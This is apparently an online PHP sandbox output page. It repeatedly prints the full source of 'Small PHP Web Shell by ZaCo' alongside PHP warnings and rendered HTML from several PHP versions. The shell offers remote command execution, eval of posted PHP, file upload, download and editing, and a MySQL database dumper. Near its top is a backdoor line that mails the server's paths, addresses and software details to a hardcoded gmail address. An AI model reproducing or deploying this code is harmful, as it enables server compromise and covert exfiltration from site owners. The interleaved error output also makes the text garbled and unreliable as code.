`'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value=' Warning: Undefined variable $user in /in/avLYS on line 447 '></td><td>Passwd :<input name='passwd' type=text value=' Warning: Undefined variable $passwd in /in/avLYS on line 447 '></td><td>Host :<input name='host' type=text value=' Warning: Undefined variable $host in /in/avLYS on line 447 '></td><td>DB :<input name='db' type=text value=' Warning: Undefined variable $db in /in/avLYS on line 447 '></td></tr> <tr><textarea name='query' cols=120 rows=20> Warning: Undefined variable $query in /in/avLYS on line 448 Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /in/avLYS on line 448 </textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value=' Warning: Undefined variable $db in /in/avLYS on line 453 '></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>
Output for 8.0.0 - 8.0.12, 8.0.14 - 8.0.30
<? ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # All bugs -> mailo:zaco@yandex.ru # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; $page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:''); $page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page; $winda=strpos(strtolower(php_uname()),'wind'); define('format',50); $pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:''); switch($page) { case 'eval': { $eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:''; $eval_value=magic_q($eval_value); $action=isset($_POST['action'])?$_POST['action']:'eval'; if($action=='eval_in_html') @eval($eval_value); else { echo($head.$pages); ?> <hr> <form method=post> <textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea> <input name='action' value='eval' type='submit'> <input name='action' value='eval_in_html' type='submit'> <input name='page' value='eval' type=hidden> </form> <hr> <? } break; } case 'cmd': { $cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):''; $work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd(); $action=isset($_POST['action'])?$_POST['action']:'cmd'; if(@is_dir($work_dir)) { @chdir($work_dir); $work_dir=getcwd(); if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; } else if(file_exists($work_dir))$work_dir=realpath($work_dir); $work_dir=str_replace('\\','/',$work_dir); $e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES); switch($action) { case 'cmd' : { echo($head.$pages); ?> <form method='post' name='main_form'> <input name='work_dir' value=' Warning: Undefined variable $e_work_dir in /in/avLYS on line 117 ' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=' Warning: Undefined variable $cmd in /in/avLYS on line 122 '> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <? if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");} else { $f_action=isset($_POST['f_action'])?$_POST['f_action']:'view'; if(@is_dir($work_dir)) { echo('<strong>Listing '.$e_work_dir.'</strong><hr>'); $handle=@opendir($work_dir); if($handle) { while(false!==($fn=readdir($handle))){$files[]=$fn;}; @closedir($handle); sort($files); $not_dirs=array(); for($i=0;$i<sizeof($files);$i++) { $fn=$files[$i]; if(is_dir($fn)) { echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','&quot;',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } else {$not_dirs[]=$fn;} } for($i=0;$i<sizeof($not_dirs);$i++) { $fn=$not_dirs[$i]; echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','&quot;',$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn))); if($winda===false) { $owner=@posix_getpwuid(@fileowner($work_dir.$fn)); $group=@posix_getgrgid(@filegroup($work_dir.$fn)); printf("% 20s|% -20s",$owner['name'],$group['name']); } echo(@get_perms($work_dir.$fn).str_repeat(' ',10)); printf("% 20s ",@filesize($work_dir.$fn).'B'); printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n"); } echo('</pre><hr>'); ?> <form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form> <? } else echo('Error Listing '.$e_work_dir); } else switch($f_action) { case 'view': { echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n"); $f=@fopen($work_dir,'r'); ?> <form method=post> <textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea> <input name='page' value='cmd' type=hidden> <input name='work_dir' type=hidden value=' Warning: Undefined variable $e_work_dir in /in/avLYS on line 210 ' size=120> <input name='f_action' value='save' type=submit> </form> <? break; } case 'save' : { $file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):''; $f=@fopen($work_dir,'w'); if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n"); else { fwrite($f,$file_text); fclose($f); echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n"); } break; } } break; } break; } case 'upload' : { if($work_dir=='')$work_dir='/'; else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/'; $f=$_FILES["filename"]["name"]; if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed'); else { echo('file is uploaded in '.$e_work_dir); } break; } case 'download' : { $fname=isset($_POST['fname'])?$_POST['fname']:''; $temp_file=isset($_POST['temp_file'])?'on':'nn'; $f=@fopen($fname,'r'); if(!($f)) echo('file is not exists'); else { $archive=isset($_POST['archive'])?$_POST['archive']:''; if($archive=='gzip') { Header("Content-Type:application/x-gzip\n"); $s=gzencode(fread($f,filesize($fname))); Header('Content-Length: '.strlen($s)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n"); echo($s); } else { Header("Content-Type:application/octet-stream\n"); Header('Content-Length: '.filesize($fname)."\n"); Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n"); ob_start(); while(feof($f)===false) { echo(fread($f,10000)); ob_flush(); } } } } } break; } case 'mysql' : { $action=isset($_POST['action'])?$_POST['action']:'query'; $user=isset($_POST['user'])?$_POST['user']:''; $passwd=isset($_POST['passwd'])?$_POST['passwd']:''; $db=isset($_POST['db'])?$_POST['db']:''; $host=isset($_POST['host'])?$_POST['host']:'localhost'; $query=isset($_POST['query'])?magic_q($_POST['query']):''; switch($action) { case 'dump' : { $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false; $archive=isset($_POST['archive'])?$_POST['archive']:'none'; if($archive!=='none')$to_file=false; $db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:''; $table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:''; if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error'); else { $dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n"; ob_start(); if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false; if($table_dump=='') { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $result=mysql_query('show tables',$mysql_link); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); $result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link); if(!$result2)$dump_file.='#error table '.$rows[0]; else { $dump_file.='create table `'.$rows[0]."`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$rows[0].'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); } } mysql_free_result($result); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo($dump_file); } else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } else { $result2=@mysql_query('show columns from `'.$table_dump.'`',$mysql_link); if(!$result2)echo('error table '.$table_dump); else { if(!$to_file) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } if($to_file===false) { header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n"); header("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n"); } $dump_file.="create table `{$table_dump}`(\n"; for($j=0;$j<mysql_num_rows($result2)-1;$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n"; } $rows2=mysql_fetch_array($result2); $dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n"; $type[$j]=$rows2[1]; $dump_file.=");\n"; mysql_free_result($result2); $result2=mysql_query('select * from `'.$table_dump.'`',$mysql_link); $columns=$j-1; for($j=0;$j<mysql_num_rows($result2);$j++) { $rows2=mysql_fetch_array($result2); $dump_file.='insert into `'.$table_dump.'` values ('; for($k=0;$k<$columns;$k++) { $dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\','; } $dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n"; if($archive=='none') { if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);} else { echo($dump_file); ob_flush(); } $dump_file=''; } } mysql_free_result($result2); if($archive!='none') { $dump_file=gzencode($dump_file); header('Content-Length: '.strlen($dump_file)."\n"); echo $dump_file; }else if($t_f) { fclose($t_f); echo('Dump for '.$db_dump.' now in '.$to_file); } } } } } break; } case 'query' : { echo($head.$pages); ?> <hr> <form method=post> <table> <td> <table align=left> <tr><td>User :<input name='user' type=text value=' Warning: Undefined variable $user in /in/avLYS on line 447 '></td><td>Passwd :<input name='passwd' type=text value=' Warning: Undefined variable $passwd in /in/avLYS on line 447 '></td><td>Host :<input name='host' type=text value=' Warning: Undefined variable $host in /in/avLYS on line 447 '></td><td>DB :<input name='db' type=text value=' Warning: Undefined variable $db in /in/avLYS on line 447 '></td></tr> <tr><textarea name='query' cols=120 rows=20> Warning: Undefined variable $query in /in/avLYS on line 448 </textarea></tr> </table> </td> <td> <table> <tr><td>DB :</td><td><input type=text name='db_dump' value=' Warning: Undefined variable $db in /in/avLYS on line 453 '></td></tr> <tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <tr><td><input type=submit name='action' value='dump'></td></tr> <tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr> </table> </td> </table> <input name='page' value='mysql' type=hidden> <input name='action' value='query' type=submit> </form> <hr> <? $mysql_link=@mysql_connect($host,$user,$passwd); if(!($mysql_link)) echo('Connect error'); else { if($db!='')if(!(@mysql_select_db($db,$mysql_link))){echo('DB error');mysql_close($mysql_link);break;} //@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols $result=@mysql_query($query,$mysql_link); if(!($result))echo(mysql_error()); else { echo("<table valign=top align=left>\n<tr>"); for($i=0;$i<mysql_num_fields($result);$i++) echo('<td><b>'.htmlspecialchars(mysql_field_name($result,$i)).'</b> </td>'); echo("\n</tr>\n"); for($i=0;$i<mysql_num_rows($result);$i++) { $rows=mysql_fetch_array($result); echo('<tr valign=top align=left>'); for($j=0;$j<mysql_num_fields($result);$j++) { echo('<td>'.(htmlspecialchars($rows[$j])).'</td>'); } echo("</tr>\n"); } echo("</table>\n"); } mysql_close($mysql_link); } break; } } break; } } ?>
Output for 8.0.13
Fatal error: Array and string offset access syntax with curly braces is no longer supported in /in/avLYS on line 105
Process exited with code 255.
Output for 7.4.33
Deprecated: Array and string offset access syntax with curly braces is deprecated in /in/avLYS on line 105 Deprecated: Array and string offset access syntax with curly braces is deprecated in /in/avLYS on line 105 Deprecated: Array and string offset access syntax with curly braces is deprecated in /in/avLYS on line 237 Deprecated: Array and string offset access syntax with curly braces is deprecated in /in/avLYS on line 237 Notice: Undefined variable: sd98 in /in/avLYS on line 24 Notice: Undefined index: HTTP_REFERER in /in/avLYS on line 24 Notice: Undefined index: REMOTE_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_ADDR in /in/avLYS on line 24 Notice: Undefined index: SERVER_SOFTWARE in /in/avLYS on line 24 Warning: mail() has been disabled for security reasons in /in/avLYS on line 24 Warning: shell_exec(): Unable to execute 'id' in /in/avLYS on line 70 <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style><center>###<a href='avLYS'>cmd</a>###<a href='avLYS?mysql'>mysql</a>###<a href='avLYS?eval'>eval</a>###</center>id :<form method='post' name='main_form'> <input name='work_dir' value='/' type=text size=120> <input name='page' value='cmd' type=hidden> <input type=submit value='go'> </form> <form method=post> <input name='cmd' type=text size=120 value=''> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post enctype="multipart/form-data"> <input type="file" name="filename"> <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <form method=post> <input name='fname' type=text size=120><br> <input name='archive' type=radio value='none'>without arch <input name='archive' type=radio value='gzip' checked=true>gzip archive <input name='work_dir'type=hidden> <input name='page' value='cmd' type=hidden> <input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;"> </form> <pre> <strong>Listing /</strong><hr><a href='#' onclick='document.list.work_dir.value="/.";document.list.submit();'><b>.</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 126B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/..";document.list.submit();'><b>..</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 126B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/bin";document.list.submit();'><b>bin</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-x--x 10686B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/boot";document.list.submit();'><b>boot</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/dev";document.list.submit();'><b>dev</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 400B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/etc";document.list.submit();'><b>etc</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 408B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/home";document.list.submit();'><b>home</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | --------- 40B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/in";document.list.submit();'><b>in</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 60B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/lib";document.list.submit();'><b>lib</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-x--x 1294B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/lib64";document.list.submit();'><b>lib64</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-x--x 1294B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/mnt";document.list.submit();'><b>mnt</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/opt";document.list.submit();'><b>opt</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/proc";document.list.submit();'><b>proc</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | r-xr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/root";document.list.submit();'><b>root</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | --------- 40B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/run";document.list.submit();'><b>run</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxrwxrwx 80B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/sbin";document.list.submit();'><b>sbin</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-x--x 10686B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/srv";document.list.submit();'><b>srv</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 14B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/sys";document.list.submit();'><b>sys</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | r-xr-xr-x 0B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/tmp";document.list.submit();'><b>tmp</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxrwxrwx 120940B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/usr";document.list.submit();'><b>usr</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 70B Sep 10 2014 15:49:46 <a href='#' onclick='document.list.work_dir.value="/var";document.list.submit();'><b>var</b></a> Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 Notice: Trying to access array offset on value of type bool in /in/avLYS on line 167 | rwxr-xr-x 96B Sep 10 2014 15:49:46 </pre><hr><form name='list' method=post> <input name='work_dir' type=hidden size=120><br> <input name='page' value='cmd' type=hidden> <input name='f_action' value='view' type=hidden> </form>
Output for 7.2.29 - 7.2.33, 7.3.16 - 7.3.31, 7.4.0 - 7.4.32
<? ########################################################## # Small PHP Web Shell by ZaCo (c) 2004-2006 # # +POST method # # +MySQL Client+Dumper for DB and tables # # +PHP eval in text format and html for phpinfo() example # # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther # # For antichat.ru and cup.su friends usage # # All bugs -> mailo:zaco@yandex.ru # # Just for fun :) # ########################################################## error_reporting(E_ALL); @set_time_limit(0); function magic_q($s) { if(get_magic_quotes_gpc()) { $s=str_replace('\\\'','\'',$s); $s=str_replace('\\\\','\\',$s); $s=str_replace('\\"','"',$s); $s=str_replace('\\\0','\0',$s); } return $s; }$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98"); function get_perms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } $head=<<<headka <html> <head> <title>Small Web Shell by ZaCo</title> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> </head> <body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34> <style> textarea { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: Fixedsys bold; } input { BORDER-RIGHT: #ffffff 1px solid; BORDER-TOP: #999999 1px solid; BORDER-LEFT: #999999 1px solid; BORDER-BOTTOM: #ffffff 1px solid; BACKGROUND-COLOR: #e4e0d8; font: 8pt Verdana; } </style> headka; 